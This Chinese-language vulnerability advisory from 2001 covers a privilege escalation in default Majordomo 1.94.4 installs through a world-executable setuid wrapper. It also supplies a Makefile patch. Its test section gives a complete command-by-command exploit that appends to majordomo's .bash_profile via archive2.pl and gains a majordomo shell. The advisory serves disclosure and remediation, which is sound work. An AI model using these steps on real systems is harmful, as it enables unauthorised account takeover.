Majordomo安装不安全问题发布时间:2001-09-24 更新时间:2001-09-24 严重程度:中 威胁程度:权限提升 错误类型:设计错误 利用方式:服务器模式 受影响系统 Majordomo version 1.94.4详细描述 Majordomo是自动管理邮件列表的程序,如果管理员没有按照INSTALL文件中描述的实现安装就存在漏洞可以让普通用户获得Majordomo用户权利。 测试代码 $ id -a uid=1001(marco) gid=100(users) groups=100(users) This could happen if you give it a /home/majordomo $ ls -al /home/|grep majordomo drwxr-x--x 6 majordom daemon 4096 Sep 13 23:50 majordomo/ Suidbit + executable for everyone (this is where the patch comes in) $ ls -al ~majordomo/wrapper -rwsr-xr-x 1 root daemon 16451 Aug 31 13:51 /home/majordomo/wrapper* This is the program we are going to abuse: $ ls -al ~majordomo/archive2.pl -rwxr-xr-x 1 majordom daemon 5234 Aug 31 13:51 /home/majordomo/archive2.pl* Make a template $ echo "ln -s /bin/sh ~/majordomo/sh 2>/dev/null">test Append majordomo's .bash_profile (or .profile etc) with your template using the buggy archive2.pl (it is not wrapper that is buggy here, but rather archive2.pl). $ ~majordomo/wrapper archive2.pl -f .bash_profile -a ~marco/test Now hit the .bash_profile (sometimes the majordomo admin might need it and do the same). $ su - majordomo Password: $ id -a uid=666(majordomo) gid=2(daemon) groups=2(daemon) $ exit See if it worked: $ ls -al ~majordomo/sh lrwxrwxrwx 1 majordom daemon 7 Sep 13 23:57 /home/majordomo/sh -> /bin/sh* Yes, it worked, now someone could abuse it: $ ~majordomo/wrapper sh sh-2.05$ id -a uid=666(majordomo) gid=2(daemon) groups=100(users) sh-2.05$ As you can see, we are 'majordomo'. 解决方案 Patch: --- Simple patch to make default install more secure --- --- Makefile.orig Fri Sep 14 09:43:45 2001 +++ Makefile Fri Sep 14 09:44:20 2001 @@ -42,7 +42,7 @@ # change these values! WRAPPER_OWNER = root WRAPPER_GROUP = $(W_GROUP) -WRAPPER_MODE = 4755 +WRAPPER_MODE = 4750 POSIX = -DPOSIX_UID=$(W_USER) -DPOSIX_GID=$(W_GROUP) # Otherwise, if your system is NOT POSIX (e.g. SunOS 4.x, SGI Irix 4, # HP DomainOS) then comment out the above four lines and uncomment 相关信息 m.v.berkum at obit.nl |
